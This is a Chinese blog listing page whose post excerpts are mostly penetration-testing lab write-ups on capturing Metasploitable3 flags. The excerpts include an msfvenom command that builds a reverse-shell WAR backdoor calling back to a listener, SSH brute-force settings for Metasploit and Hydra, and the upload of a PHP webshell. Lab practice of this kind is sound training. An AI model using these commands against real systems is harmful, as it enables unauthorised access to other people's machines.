自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 收藏
  • 关注

原创 Kali镜像源同步问题

Kali的源,网络,犹如六月的天,犹如孩子的脸,说变就变,说出问题就出问题,急转弯快的你猝不及防。这不今天又给我搞一出文件尺寸不符(12812582 != 12813041)。您使用的镜像正在同步中? 具体的图我没截,但可以看出又是源出问题。什么?你叫我百度一下解决?嗯,得出的是这种结果,所以说搜技术上的问题,我很少用百度果断谷歌搜了一波我是参照这位大佬的博客改的,...

2019-02-19 23:39:50 2230 2

原创 vuluhub

Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware !(IMPORTANT NOTE : The whole challenge is in fren...

2019-02-11 01:32:58 1180

原创 另一种方法

上一次拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录这里显示能上传一个.war文件,我用msfvenom生成一个war的后门msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545payload.war这次不用metasploit,改用netcat侦听4545端口...

2019-02-03 21:48:33 3233

原创 Metasploitable3-Ace of Hearts 第八个flag

这是第八个flag.结合之前的信息搜集,我们打开nessus的扫描报告CVE-2015-8249ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadSe...

2019-02-03 17:56:46 973

原创 Metasploitable3-Jack of Clubs 第九个flag

 这是第九个flag.首先从nmap扫描中我们可以得出以下信息8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1http-favicon: Apache Tomcathttp-server-header: Apache-Coyote/1.1http-title: Apache Tomcat/8.0.33Tomcat是A...

2019-02-03 17:52:15 701

原创 Metasploitable3-Joker 第七个flag

 这一次,我要捉一个小丑,joker通过前期nmap的信息搜集,靶机开放的161端口 snmp(public)80端口 http既然开着snmp服务,就先来一波snmp检测在kali下有两个工具可以完成snmp检测,一个是snmp-check,另外一个是msf下的msf>use auxiliary/scanner/snmp/snmp_enum模块首先我方派出的是snmp...

2019-02-02 20:17:13 1293

原创 Metasploitable3-Seven of Spades 第六个flag

 经过信息搜集,我发现靶机开放22端口所以还是使用ssh爆破,这一次用xhydra,xhydra是hydra的图形化界面在终端上输入xhydra,设置好相关参数点一下Passwords菜单,设置好相关字典在Tuning设置相关进程开始爆破,得出7个可用账户密码任选一个用户登录进入靶机,找到public目录,经过寻找,最终在Documents目录下找到seven_of_spa...

2019-02-02 17:36:08 966

原创 Metasploitable3-Ten of Diamonds 第五个flag

这次依然使用ssh爆破上一次我用的是msf里面的ssh爆破模块,这一次我换一个,hydrahydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码,支持多种网络服务的非常快速的网络登陆破解工具,是一个验证性工具,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,...

2019-02-02 15:33:56 755

原创 Metasploitable3-Jack of Hearts 第四个flag

 今天要拿下的是第四个flag,Jack of Heart攻击方向是22端口启动msf准备好爆破的字典在msf中搜索ssh爆破模块使用相关模块并设置参数set PASS_FILE ~/pass.txtset USER_FILE ~/user.txtset rhost 192.168.0.100run爆破完成爆出7个session用管理员账户进行ssh登录找到相关f...

2019-02-02 13:51:01 950

原创 Metasploitable3-Six of Diamonds 第三个flag

在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。我用到了kali的工具cadaver在上传php文件前,我首先上传一个txt文件验证一下先在kali内新建一个txt文件保存后上传上传成功,打开浏览器验证用gedit新建一个chopper.php文件,用cadver上传上传成功然后用菜刀连接我...

2019-02-02 01:23:43 1647

原创 metasploitable3 靶机介绍与相关信息搜集

metasploitable3:虚拟靶机 发布于2016年11月,含有15个flag文件,每个flag文件都是扑克指牌所需系统要求:System Requirements:OS capable of running all of the required applications listed belowVT-x/AMD-V Supported Processor recommende...

2019-02-01 18:01:13 2826

原创 Metasploitable3-King of Hearts 第二个flag

在抓捕第一个方块K的过程中,同时发现了第二个flag,红心K的踪迹,它与方块K在同一个木目录下下面,具体过程和前面第一个flag一样,略过不表来到2016目录,点进去,再从09目录点进去来到熟悉的目录下面king of heart和上一个flag不同的地方在于,它的文件名并没有明明白白地写着king of hearts,而是写成metasploitable3_flag,在metaspl...

2019-02-01 17:28:21 1269

原创 metasploitable3 第一个flag, King of Diamond

nmap扫描对应的端口192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10用浏览器访问一下打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息从phpinfo中我们得到以下有关靶机的信息靶机系统版本:Windows NT METASPLOITABLE3 6....

2019-02-01 16:47:21 2918 4

转载 request代理问题

代理(Streaming Requests)如果你需要使用一个代理,你可以在任何请求方法中使用proxies参数配置单个请求:import requestsproxies = { "http": "10.10.1.10:3128", "https": "10.10.1.10:1080",}requests.get("http://example.org", pro

2017-08-16 23:03:21 1116

原创 pyqt笔记

忙了一天,终于将pyqt的环境配置好,并且用ui整出第一个图形界面,虽然之前用过C++和python的tkinter写过界面,但能将界面显示出来,证明一天的努力没有白费,现将今天的成果总结一下。  1.环境配置问题:   这是整个过程中遇到的第一个,也是花费时间最多的问题,我用的是pycharm社区版,python的版本是2.7.13,系统是win7 64位,按照一般的方法,安装pytho

2017-08-13 23:03:33 498

转载 PHP产生不重复随机数的5个方法总结(该文章转自酷笔记http://www.kubiji.cn/topic-id3976.html)

这篇文章主要介绍了PHP产生不重复随机数的5个方法总结,PHP随机数经常在项目中使用,本文总结了网络上的和自己项目中用到的随机数生成方法,需要的朋友可以参考下无论是Web应用,还是WAP或者移动应用,随机数都有其用武之地。在最近接触的几个小项目中,我也经常需要和随机数或者随机数组打交道,所以,对于PHP如何产生不重复随机数常用的几种方法小结一下(ps:方法1、4、5是我常用的,其余来自

2017-02-16 17:38:15 828

转载 Linux文件管理命令1

基础文件管理命令      1、你在哪之pwd命令      pwd:print working directory ,也就是显示当前所在目录的意思      用法:直接敲pwd即可      2、改变你所在的目录之cd命令      cd:change directory,也就是切换/改变目录的意思      用法:cd [相对路径或绝对路径]      相对路径

2016-11-17 21:06:17 263

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除